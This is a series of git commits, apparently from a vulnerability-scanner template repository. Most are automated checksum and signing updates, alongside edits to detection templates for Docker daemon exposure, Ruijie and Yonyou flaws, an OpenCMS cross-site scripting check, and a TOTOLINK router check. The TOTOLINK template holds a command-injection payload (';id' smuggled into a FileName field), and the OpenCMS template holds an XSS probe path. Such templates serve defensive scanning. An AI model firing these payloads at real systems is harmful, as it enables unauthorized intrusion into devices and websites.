templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9c9f108b15..e6795d77c1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -936,6 +936,7 @@ http/cves/2015/CVE-2015-2080.yaml:180c0d9b39eebb25504e19d83aaab1b4cf8bfa97 http/cves/2015/CVE-2015-2166.yaml:9435d5238cddf255b9814a424181cb529938bcad http/cves/2015/CVE-2015-2196.yaml:dbd9f617f9f46da1f41b7e7b37516bd03bef7b8d http/cves/2015/CVE-2015-2755.yaml:2a87aa2692d6aed72de82010b13300b8cb1b9f8f +http/cves/2015/CVE-2015-2794.yaml:b036e7c53bd80e6f25df2d0ec1cd6d3b707d9429 http/cves/2015/CVE-2015-2807.yaml:770045f6ee23a0ec2ee49617c6925bf7f2259681 http/cves/2015/CVE-2015-2863.yaml:4479beacef9707ef297d61a4a357119d030687df http/cves/2015/CVE-2015-2996.yaml:b03d095677bb8644c23b9f2cea10c194d714f879 @@ -6621,7 +6622,7 @@ http/token-spray/api-nytimes.yaml:515f52e0dbaa76c67e47a0e0f63a607b966520d7 http/token-spray/api-onelogin.yaml:c1970dce04c68ff40687f9aa5189fbdf2f07bdd2 http/token-spray/api-onyphe.yaml:c931393e726323591b3f170ddda5e4dd548e4c8a http/token-spray/api-open-page-rank.yaml:291f62ec42ea118f68223e44043d39e1c6d616a2 -http/token-spray/api-openai.yaml:9d86191e26bae37c68d5986d46e1ee613b81eb7c +http/token-spray/api-openai.yaml:98b146f8013df819687095a1bc26f045513d373e http/token-spray/api-opengraphr.yaml:5c15cfdbb054e77687564346951337cc0904f151 http/token-spray/api-openweather.yaml:489a77cb31f3b4510b748c12ec2104d6a43a6ec7 http/token-spray/api-opsgenie.yaml:bb7a91bd82ee7c96607e1963dbbf8b41af56832a @@ -7209,7 +7210,7 @@ http/vulnerabilities/ruijie/ruijie-excu-shell.yaml:4e44d86d3461ede6a3e205a00a96c http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml:d21221f94ba84906b86aebb2ef888e8df203035f http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:c3789288ed1f6805695c9ccc837a1b056f017975 http/vulnerabilities/ruijie/ruijie-password-leak.yaml:b40b0764c02ffb6af9faef8f9153a8995c0f0522 -http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml:1ab8db1b41bfc5e613f4fbe99f417739d332eb31 +http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml:53008f0d81816731ea6a5a41c1d7bb8712c71f41 http/vulnerabilities/ruijie-eg-login-rce.yaml:95135a8fbb28e97e78f39b9c640f6dca3a49c283 http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml:48d0b9ac33013573db9fa5ecc17282a88729fda9 http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml:a4258c6a3d83986629e3a30e17e98de93180ffdc @@ -7709,7 +7710,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:42fd128a2bf9803063b17dfe3796e7c460f14fa4 +templates-checksum.txt:b4eb0ed554226ec504c25c95a5d9e1714f0a0955 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 866324aef9e51ddab14682b29adce4f0dec3e86f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Dec 2023 14:32:11 +0000 Subject: [PATCH 42/64] Auto Template Signing [Tue Dec 26 14:32:11 UTC 2023] :robot: --- http/cves/2015/CVE-2015-2794.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml index ca3d0cdf13..fe3ac288a1 100644 --- a/http/cves/2015/CVE-2015-2794.yaml +++ b/http/cves/2015/CVE-2015-2794.yaml @@ -42,3 +42,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402201158c001259e4db42e4a00041d56cb95363728da7170e407c3c0d99701f0f426022078549a7f4b8f1aca49f2e0c6dd0849c52df6812d9e901daa10b925a59aea47c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 346a5b3546b0decc0988c37fe5f5867ececcefcf Mon Sep 17 00:00:00 2001 From: Arm!tage <48816467+Arrnitage@users.noreply.github.com> Date: Wed, 27 Dec 2023 10:20:29 +0800 Subject: [PATCH 43/64] Update docker-daemon-exposed.yaml --- http/exposures/docker-daemon-exposed.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index b0f94be1b1..152f9daaf0 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -40,8 +40,6 @@ http: part: body_2 words: - '[]' - - '"ImageID":' - - '"HostConfig":' condition: and extractors: From 0cac82af9f64a32a2d6881b8c939a051c2c616b0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 05:50:50 +0000 Subject: [PATCH 44/64] Auto Generated New Template Addition List [Wed Dec 27 05:50:50 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 42a4564a2a..32c14f6e7c 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ http/cves/2015/CVE-2015-2794.yaml http/token-spray/api-openai.yaml http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml +http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml From 6288db3204d40a54bccb0cfcc8dc6aec32aadcb7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 05:51:14 +0000 Subject: [PATCH 45/64] Auto Generated Templates Checksum [Wed Dec 27 05:51:14 UTC 2023] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e6795d77c1..d4577df9c5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -12,8 +12,8 @@ code/cves/2023/CVE-2023-49105.yaml:3512873783f700bf5fb98b342dd84653085a0a79 code/cves/2023/CVE-2023-4911.yaml:b0087888697dcdbdf06ec95866cf08fcd6a2a76a config/recommended.yml:56cce704c23915f282aa2bca69952626aeea5e13 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:4500cac1239266cc0c96b02fc4bf689290b18f93 -cves.json-checksum.txt:f110519bd9447c733f8276833f45a4c38375f1ed +cves.json:06f1b457f42fb28649ba5342a462c84c3f8c2fda +cves.json-checksum.txt:fc7c554376e31384ec60488e43ac7b322c0b616a dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 @@ -936,7 +936,7 @@ http/cves/2015/CVE-2015-2080.yaml:180c0d9b39eebb25504e19d83aaab1b4cf8bfa97 http/cves/2015/CVE-2015-2166.yaml:9435d5238cddf255b9814a424181cb529938bcad http/cves/2015/CVE-2015-2196.yaml:dbd9f617f9f46da1f41b7e7b37516bd03bef7b8d http/cves/2015/CVE-2015-2755.yaml:2a87aa2692d6aed72de82010b13300b8cb1b9f8f -http/cves/2015/CVE-2015-2794.yaml:b036e7c53bd80e6f25df2d0ec1cd6d3b707d9429 +http/cves/2015/CVE-2015-2794.yaml:ba064904aecb2a2d6c43afa9c4b014fe48531535 http/cves/2015/CVE-2015-2807.yaml:770045f6ee23a0ec2ee49617c6925bf7f2259681 http/cves/2015/CVE-2015-2863.yaml:4479beacef9707ef297d61a4a357119d030687df http/cves/2015/CVE-2015-2996.yaml:b03d095677bb8644c23b9f2cea10c194d714f879 @@ -7515,6 +7515,7 @@ http/vulnerabilities/yonyou/wooyun-path-traversal.yaml:834c86504e945da05e4a3c818 http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml:0748e078a3e4d2b1c2665ee271393df76f2b50c4 http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml:3bf657199eaa62538621ae0b76b611ecdafe7d83 http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml:1ffe1e3009245779da07ca87f610f0efc35c174e +http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml:70cb8c72cfea4cf75435fe633f4b0ad9eeba5cd1 http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml:ba49da8c71e4e9b1ba7fd6c86e259418262a38db http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml:4585fe5be1b00ae9d8546f4e3bf86b588f1ea186 http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml:87bb7c0da6d60ee728ce4892ced883dbb9e4ba9d @@ -7710,7 +7711,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:b4eb0ed554226ec504c25c95a5d9e1714f0a0955 +templates-checksum.txt:61f02f0373d4cf402f1afc9519d221eefc87863c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 47efb3917ea64f8a712548817002a5835e0a5719 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 05:52:47 +0000 Subject: [PATCH 46/64] Auto Template Signing [Wed Dec 27 05:52:47 UTC 2023] :robot: --- http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml index c01041ca93..312025dd3b 100644 --- a/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml @@ -36,3 +36,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100922859f664e4119692c97837afcf0e55f50952e31ba4d106bfced7a702cde4c3022100db43d0d8ca69943f8ecf515a9ee9e142599c9d652ffef759f0238a20f7056e2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 3373976e28f2efdb4bb0d1083fec0747ee22e977 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 27 Dec 2023 13:15:53 +0530 Subject: [PATCH 47/64] dsl - update --- http/exposures/docker-daemon-exposed.yaml | 23 ++++++----------------- 1 file changed, 6 insertions(+), 17 deletions(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index 152f9daaf0..e62b53f228 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -23,23 +23,12 @@ http: GET /v{{version}}/containers/json HTTP/1.1 Host: {{Hostname}} - matchers-condition: or matchers: - - type: word - part: body_2 - words: - - "Id" - - "Names" - - "Image" - - "Command" - - "PrivatePort" - - "PublicPort" - condition: and - - - type: word - part: body_2 - words: - - '[]' + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_1, "ApiVersion") && contains(body_1, "GitCommit") && contains(body_1, "GoVersion") && contains(body_1, "KernelVersion")' + - 'contains(body_2, "Id") && contains(body_2, "Names") && contains(body_2, "Image") && contains(body_2, "Command") && contains(body_2, "PrivatePort") && contains(body_2, "PublicPort") || contains(body_2, "[]")' condition: and extractors: @@ -48,4 +37,4 @@ http: group: 1 regex: - '"ApiVersion":"(.*?)"' - internal: true + internal: true \ No newline at end of file From 9b9c642d43f6152b2333084039acdc8e1ddabcfe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 07:50:06 +0000 Subject: [PATCH 48/64] Auto Generated New Template Addition List [Wed Dec 27 07:50:05 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 32c14f6e7c..b0a9d7a995 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2015/CVE-2015-2794.yaml +http/exposures/docker-daemon-exposed.yaml http/token-spray/api-openai.yaml http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml From 075ac4f0e8d93006bec7619843d6297eea9af433 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 07:50:14 +0000 Subject: [PATCH 49/64] Auto Generated Templates Checksum [Wed Dec 27 07:50:14 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d4577df9c5..8775934701 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4231,6 +4231,7 @@ http/exposures/configs/wpconfig-aws-keys.yaml:b7a010abea8ee72e3c7ffb7602f2fd10b7 http/exposures/configs/xprober-service.yaml:3480056d644ec37a3b9ce5e81f55b9b279d66880 http/exposures/configs/yii-debugger.yaml:ea6beec4c6f22d31b0402f8ad1590aa8d87166de http/exposures/configs/zend-config-file.yaml:dd51767a5f5fbbc68e0d0f2f82ecaf7eb390a47b +http/exposures/docker-daemon-exposed.yaml:1a906cb866350a3f2615324f8a11328aab8671e0 http/exposures/files/angular-json.yaml:33a8441b1e158d34f7f877820ba705662f9ba017 http/exposures/files/apache-licenserc.yaml:e7bf77390ddc3ece376cee856d2f8beb4820ef9b http/exposures/files/apdisk-disclosure.yaml:d911bc900df9ebb34b5068a66376c86aee4a1b90 @@ -7515,7 +7516,7 @@ http/vulnerabilities/yonyou/wooyun-path-traversal.yaml:834c86504e945da05e4a3c818 http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml:0748e078a3e4d2b1c2665ee271393df76f2b50c4 http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml:3bf657199eaa62538621ae0b76b611ecdafe7d83 http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml:1ffe1e3009245779da07ca87f610f0efc35c174e -http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml:70cb8c72cfea4cf75435fe633f4b0ad9eeba5cd1 +http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml:2e2099e6cd39c30a2b7f8096d5e65340142e009b http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml:ba49da8c71e4e9b1ba7fd6c86e259418262a38db http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml:4585fe5be1b00ae9d8546f4e3bf86b588f1ea186 http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml:87bb7c0da6d60ee728ce4892ced883dbb9e4ba9d @@ -7711,7 +7712,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:61f02f0373d4cf402f1afc9519d221eefc87863c +templates-checksum.txt:0c2a4ee0f79c4db800e40b84866a0f956830ce4a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 97cfaf6f53ba1e3e144418e9b78a2977f5da7c17 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 07:51:49 +0000 Subject: [PATCH 50/64] Auto Template Signing [Wed Dec 27 07:51:49 UTC 2023] :robot: --- http/exposures/docker-daemon-exposed.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index e62b53f228..857e0c35fb 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -37,4 +37,5 @@ http: group: 1 regex: - '"ApiVersion":"(.*?)"' - internal: true \ No newline at end of file + internal: true +# digest: 490a00463044022078569870dba91a13ef48bf89cc7acf390bd48f5466e1721acfa1337f23fd752802207843a2e01e46cb87cdc2cfa9f8ea3a3d5a0fa0ed378bee864de3e52ca24a4339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1d1a76f97ef5ff9544914b01acbcde346258db25 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 27 Dec 2023 14:22:44 +0530 Subject: [PATCH 51/64] Create CVE-2023-42343.yaml --- http/cves/2023/CVE-2023-42343.yaml | 32 ++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/cves/2023/CVE-2023-42343.yaml diff --git a/http/cves/2023/CVE-2023-42343.yaml b/http/cves/2023/CVE-2023-42343.yaml new file mode 100644 index 0000000000..cbd72cf1c8 --- /dev/null +++ b/http/cves/2023/CVE-2023-42343.yaml @@ -0,0 +1,32 @@ +id: CVE-2023-42343 + +info: + name: OpenCMS - Cross-Site Scripting + author: DhiyaneshDK + severity: medium + description: | + OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability. + remediation: Fixed in 10.5.1. + reference: + - https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/ + classification: + cve-id: CVE-2023-42343 + metadata: + max-request: 1 + shodan-query: "/opencms/" + verified: true + tags: cve,cve2023,xss,opencms + +http: + - method: GET + path: + - '{{BaseURL}}/opencms/cmisatom/cmis-online/type?id=1%27">' + headers: + Content-Type: application/cmisquery+xml + + matchers: + - type: word + words: + - 'Apache Chemistry OpenCMIS' + - '' + part: body From e058e85d2d11994d69e5299fb453383bc0c8d8af Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 27 Dec 2023 14:49:00 +0530 Subject: [PATCH 52/64] Update CVE-2023-46574.yaml --- http/cves/2023/CVE-2023-46574.yaml | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index b72b32e83e..344f615518 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -18,11 +18,11 @@ info: epss-percentile: 0.60602 cpe: cpe:2.3:o:totolink:a3700r_firmware:9.1.2u.6165_20211012:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 + verified: true + shodan-query: title:"Totolink" vendor: totolink product: a3700r_firmware - shodan-query: title:"Totolink" tags: cve,cve2023,totolink,router,iot,rce flow: http(1) && http(2) @@ -39,14 +39,13 @@ http: - 'contains(body, "TOTOLINK")' condition: and - - method: GET - path: - - "{{BaseURL}}/cgi-bin/cstecgi.cgi" - body: | - { - "topicurl":"UploadFirmwareFile", - "FileName":";id" - } + - raw: + - | + GET /cgi-bin/cstecgi.cgi HTTP/1.1 + Host: {{Hostname}} + + {"topicurl":"UploadFirmwareFile","FileName":";id"} + matchers-condition: and matchers: - type: regex From 3dcaf845d060919f82613ce2f6e2c5019d40f278 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 09:26:12 +0000 Subject: [PATCH 53/64] Auto Generated New Template Addition List [Wed Dec 27 09:26:12 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b0a9d7a995..eb285316c1 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2015/CVE-2015-2794.yaml +http/cves/2023/CVE-2023-46574.yaml http/exposures/docker-daemon-exposed.yaml http/token-spray/api-openai.yaml http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml From 623b71b8d3f45774eb52e22c1ea6f6812decb4f9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 09:26:24 +0000 Subject: [PATCH 54/64] Auto Generated Templates Checksum [Wed Dec 27 09:26:24 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8775934701..ddca8868f3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2884,6 +2884,7 @@ http/cves/2023/CVE-2023-45852.yaml:7a4038ad99644855dfe6f39ac7e92fd73a3d60d2 http/cves/2023/CVE-2023-4596.yaml:bde7e510ccbbc29b43e191885a24e24f57f61e10 http/cves/2023/CVE-2023-4634.yaml:daab5c713c8bd42dfa868fa9532bdd100717a39a http/cves/2023/CVE-2023-46359.yaml:d59f73a4697ea1c18976e3856588c47a78c31d7b +http/cves/2023/CVE-2023-46574.yaml:a648ce65c19263d9e44d8dfc49f1b2ae02fc19f9 http/cves/2023/CVE-2023-46747.yaml:6b2841039a71d5b669379deccc0c4a486a2d0375 http/cves/2023/CVE-2023-4714.yaml:dc45b7ef7c33406421a4adeceb368adf378546a8 http/cves/2023/CVE-2023-47246.yaml:5a472de48a5400547843cc0f0a2a647a7e96c801 @@ -4231,7 +4232,7 @@ http/exposures/configs/wpconfig-aws-keys.yaml:b7a010abea8ee72e3c7ffb7602f2fd10b7 http/exposures/configs/xprober-service.yaml:3480056d644ec37a3b9ce5e81f55b9b279d66880 http/exposures/configs/yii-debugger.yaml:ea6beec4c6f22d31b0402f8ad1590aa8d87166de http/exposures/configs/zend-config-file.yaml:dd51767a5f5fbbc68e0d0f2f82ecaf7eb390a47b -http/exposures/docker-daemon-exposed.yaml:1a906cb866350a3f2615324f8a11328aab8671e0 +http/exposures/docker-daemon-exposed.yaml:7058b14b309a1b24bf20748bc1d7672987f061de http/exposures/files/angular-json.yaml:33a8441b1e158d34f7f877820ba705662f9ba017 http/exposures/files/apache-licenserc.yaml:e7bf77390ddc3ece376cee856d2f8beb4820ef9b http/exposures/files/apdisk-disclosure.yaml:d911bc900df9ebb34b5068a66376c86aee4a1b90 @@ -7712,7 +7713,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:0c2a4ee0f79c4db800e40b84866a0f956830ce4a +templates-checksum.txt:2617bfc433a5f43d67f7b8f1a4b2c3f3985bfa88 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 89ed09faaaca57d99563ff31dff8007dfd945703 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 09:28:02 +0000 Subject: [PATCH 55/64] Auto Template Signing [Wed Dec 27 09:28:02 UTC 2023] :robot: --- http/cves/2023/CVE-2023-46574.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index 344f615518..7088380485 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -56,3 +56,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100f3b495dfdf9013fd352455e557179b61f26ea1a8b0681f19e7c5765f069fd411022100f74770687188358ff96bcf2b881c7ae1428a59ac92db8ee9398813263bef7b7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 873e2e6720882be8f30573869fd19618d430008d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 27 Dec 2023 15:14:27 +0530 Subject: [PATCH 56/64] Update ruijie-rg-uac-nmc-sync-rce.yaml --- http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml b/http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml index e7ff7a3dba..30bb423166 100644 --- a/http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml +++ b/http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml @@ -1,4 +1,4 @@ -id: ruijie-rg-uac-nmc-sync-rce +id: ruijie-nmc-sync-rce info: name: Ruijie RG-UAC nmc_sync.php - Remote Code Execution @@ -9,9 +9,9 @@ info: reference: - https://github.com/xinyisleep/pocscan/blob/main/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py metadata: + max-request: 3 verified: true - max-request: 1 - fofa-query: title="RG-UAC登录页面" && body="admin" || app="Ruijie-RG-UAC" || title="rg-uac" + fofa-query: title="RG-UAC登录页面" && body="admin" tags: rg-uac,file-upload,intrusive,ruijie variables: From 9f97180770cc56a23e2ca7e7a97c8fd3a1a81088 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 27 Dec 2023 15:14:43 +0530 Subject: [PATCH 57/64] Rename ruijie-rg-uac-nmc-sync-rce.yaml to ruijie-nmc-sync-rce.yaml --- .../{ruijie-rg-uac-nmc-sync-rce.yaml => ruijie-nmc-sync-rce.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/vulnerabilities/ruijie/{ruijie-rg-uac-nmc-sync-rce.yaml => ruijie-nmc-sync-rce.yaml} (100%) diff --git a/http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml similarity index 100% rename from http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml rename to http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml From 275504566344302170e584404b7e061d3c79ca4d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 09:47:31 +0000 Subject: [PATCH 58/64] Auto Generated New Template Addition List [Wed Dec 27 09:47:31 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index eb285316c1..4e523ae7aa 100644 --- a/.new-additions +++ b/.new-additions @@ -2,5 +2,6 @@ http/cves/2015/CVE-2015-2794.yaml http/cves/2023/CVE-2023-46574.yaml http/exposures/docker-daemon-exposed.yaml http/token-spray/api-openai.yaml +http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml From 5a6c2873c9831598a5e8caec46a6e418c80fec20 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 09:47:32 +0000 Subject: [PATCH 59/64] Auto Generated Templates Checksum [Wed Dec 27 09:47:32 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ddca8868f3..5dbef88888 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2884,7 +2884,7 @@ http/cves/2023/CVE-2023-45852.yaml:7a4038ad99644855dfe6f39ac7e92fd73a3d60d2 http/cves/2023/CVE-2023-4596.yaml:bde7e510ccbbc29b43e191885a24e24f57f61e10 http/cves/2023/CVE-2023-4634.yaml:daab5c713c8bd42dfa868fa9532bdd100717a39a http/cves/2023/CVE-2023-46359.yaml:d59f73a4697ea1c18976e3856588c47a78c31d7b -http/cves/2023/CVE-2023-46574.yaml:a648ce65c19263d9e44d8dfc49f1b2ae02fc19f9 +http/cves/2023/CVE-2023-46574.yaml:6ace2075b83e46ad50e0948d07307e229fc5762a http/cves/2023/CVE-2023-46747.yaml:6b2841039a71d5b669379deccc0c4a486a2d0375 http/cves/2023/CVE-2023-4714.yaml:dc45b7ef7c33406421a4adeceb368adf378546a8 http/cves/2023/CVE-2023-47246.yaml:5a472de48a5400547843cc0f0a2a647a7e96c801 @@ -7211,6 +7211,7 @@ 